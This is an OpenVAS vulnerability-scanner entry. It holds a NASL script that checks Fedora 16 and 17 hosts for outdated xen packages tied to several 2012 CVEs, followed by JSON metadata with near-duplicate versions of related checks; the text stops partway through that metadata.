ID OPENVAS:1361412562310864599 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the 'xen' package(s) announced via the referenced advisory.
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for xen FEDORA-2012-11182
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Description phase: when the script is run with `description` set, this block
# only registers metadata (identity, references, severity, prerequisites) and
# then exits, so none of the package comparison further down is executed.
if(description)
{
# Vendor advisory announcing the update, and the OID identifying this check.
script_xref(name:"URL", value:"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html");
script_oid("1.3.6.1.4.1.25623.1.0.864599");
script_version("$Revision: 14223 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)");
# CVE identifiers this check is associated with.
script_cve_id("CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625",
"CVE-2012-3432");
# One score/vector pair covers the whole advisory. The vector is in CVSS v2
# notation: local access, low complexity, no authentication, complete impact on
# confidentiality, integrity and availability.
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_xref(name:"FEDORA", value:"2012-11182");
script_name("Fedora Update for xen FEDORA-2012-11182");
script_tag(name:"summary", value:"The remote host is missing an update for the 'xen'
package(s) announced via the referenced advisory.");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
# Prerequisites: depends on gather-package-list.nasl and on the knowledge-base
# keys ssh/login/fedora and ssh/login/rpms, with the release key matching FC17.
# NOTE(review): presumably these keys are only populated by a successful SSH
# login, so an unauthenticated scan would never run this check -- confirm
# against gather-package-list.nasl.
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC17");
script_tag(name:"affected", value:"xen on Fedora 17");
script_tag(name:"solution", value:"Please install the updated package(s).");
# qod_type "package": the result rests on a package version comparison, not on
# probing the hypervisor. NOTE(review): a package-level result does not show
# whether the host has since been restarted into the updated xen -- verify that
# separately when triaging.
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
# Metadata registered; leave before the detection logic.
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
# Detection phase: compare the installed 'xen' RPM with the fixed build named
# in the advisory. Helpers and __pkg_match are defined outside this file
# (presumably in the included pkg-lib-rpm.inc -- confirm there).
release = rpm_get_ssh_release();
if(!release) {
  # No release string available: the host cannot be assessed, report nothing.
  exit(0);
}

res = "";

if(release == "FC17") {
  # NOTE(review): isrpmvuln() presumably returns report text when the installed
  # package is older than the given build and NULL otherwise -- confirm in
  # pkg-lib-rpm.inc.
  res = isrpmvuln(pkg:"xen", rpm:"xen~4.1.2~24.fc17", rls:"FC17");
  if(res != NULL) {
    # Finding: hand the report text to the scanner and stop.
    security_message(data:res);
    exit(0);
  }

  # The package was matched but produced no finding: exit code 99 tells the
  # scanner the host was checked and is not vulnerable, as opposed to the
  # plain exit(0) below, which reports nothing either way.
  if(__pkg_match) {
    exit(99);
  }
  exit(0);
}
{"id": "OPENVAS:1361412562310864599", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for xen FEDORA-2012-11182", "description": "The remote host is missing an update for the ", "published": "2012-08-30T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864599", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["2012-11182", "http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html"], "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "lastseen": "2019-05-29T18:39:11", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:864585", "OPENVAS:1361412562310864585", "OPENVAS:864636", "OPENVAS:864599", "OPENVAS:864639", "OPENVAS:1361412562310864494", "OPENVAS:864509", "OPENVAS:1361412562310864509", "OPENVAS:1361412562310864639", "OPENVAS:1361412562310864636"]}, {"type": "fedora", "idList": ["FEDORA:00A04209F2", "FEDORA:8E44A20A90", "FEDORA:638FD21667", "FEDORA:63A4E21779", "FEDORA:A2013212DB", "FEDORA:0275A21469", "FEDORA:4C1E320FD7", "FEDORA:C1281214A6", "FEDORA:A80012051E", "FEDORA:403F220D9F"]}, {"type": "cve", "idList": ["CVE-2012-2934", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-3432", "CVE-2012-0217"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28131", "SECURITYVULNS:DOC:28207"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0721.NASL", "OPENSUSE-2012-403.NASL", "SUSE_11_XEN-201206-120606.NASL", "ORACLEVM_OVMSA-2012-0022.NASL", "DEBIAN_DSA-2501.NASL", "FEDORA_2012-9430.NASL", "SUSE_XEN-201206-8180.NASL", "FEDORA_2012-9386.NASL", "FEDORA_2012-9399.NASL", "OPENSUSE-2012-404.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2012:1044-1", "OPENSUSE-SU-2012:1174-1", "SUSE-SU-2012:0730-1", "SUSE-SU-2012:1043-1", "OPENSUSE-SU-2012:0886-1"]}, {"type": "debian", "idList": 
["DEBIAN:DSA-2501-1:A44C3"]}, {"type": "centos", "idList": ["CESA-2012:0721"]}, {"type": "redhat", "idList": ["RHSA-2012:0721"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-1061", "ELSA-2012-0721-1", "ELSA-2012-1061-1", "ELSA-2012-0721"]}, {"type": "cert", "idList": ["VU:649219"]}, {"type": "canvas", "idList": ["SYSRET"]}, {"type": "exploitdb", "idList": ["EDB-ID:28718"]}, {"type": "cisa", "idList": ["CISA:6C290D75BE52A220342D9856F873C16E"]}, {"type": "zdt", "idList": ["1337DAY-ID-32324"]}], "modified": "2019-05-29T18:39:11", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2019-05-29T18:39:11", "rev": 2}, "vulnersScore": 7.8}, "pluginID": "1361412562310864599", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11182\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864599\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\",\n \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11182\");\n script_name(\"Fedora Update for xen FEDORA-2012-11182\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~24.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"openvas": [{"lastseen": "2018-01-02T10:58:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2017-12-29T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864599", "href": "http://plugins.openvas.org/nasl.php?oid=864599", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11182\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html\");\n script_id(864599);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\",\n \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11182\");\n script_name(\"Fedora Update for xen FEDORA-2012-11182\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~24.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2017-12-28T00:00:00", "published": "2012-08-06T00:00:00", "id": "OPENVAS:864585", "href": "http://plugins.openvas.org/nasl.php?oid=864585", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11190\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 16\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084684.html\");\n script_id(864585);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-06 11:20:05 +0530 (Mon, 06 Aug 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\", \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11190\");\n script_name(\"Fedora Update for xen FEDORA-2012-11190\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~9.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:07:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3433", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2018-01-05T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864636", "href": "http://plugins.openvas.org/nasl.php?oid=864636", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11755", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11755\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085347.html\");\n script_id(864636);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 09:53:36 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-3433\", \"CVE-2012-3432\", \"CVE-2012-0217\", \"CVE-2012-0218\",\n \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11755\");\n script_name(\"Fedora Update for xen FEDORA-2012-11755\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.3~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-06T00:00:00", "id": "OPENVAS:1361412562310864585", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864585", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11190\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084684.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864585\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-06 11:20:05 +0530 (Mon, 06 Aug 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\", \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11190\");\n script_name(\"Fedora Update for xen FEDORA-2012-11190\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xen on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n 
exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~9.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3433", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864636", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864636", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11755", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11755\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085347.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864636\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 09:53:36 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-3433\", \"CVE-2012-3432\", \"CVE-2012-0217\", \"CVE-2012-0218\",\n \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11755\");\n script_name(\"Fedora Update for xen FEDORA-2012-11755\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n 
exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.3~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864509", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864509\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-9386\");\n script_name(\"Fedora Update for xen FEDORA-2012-9386\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 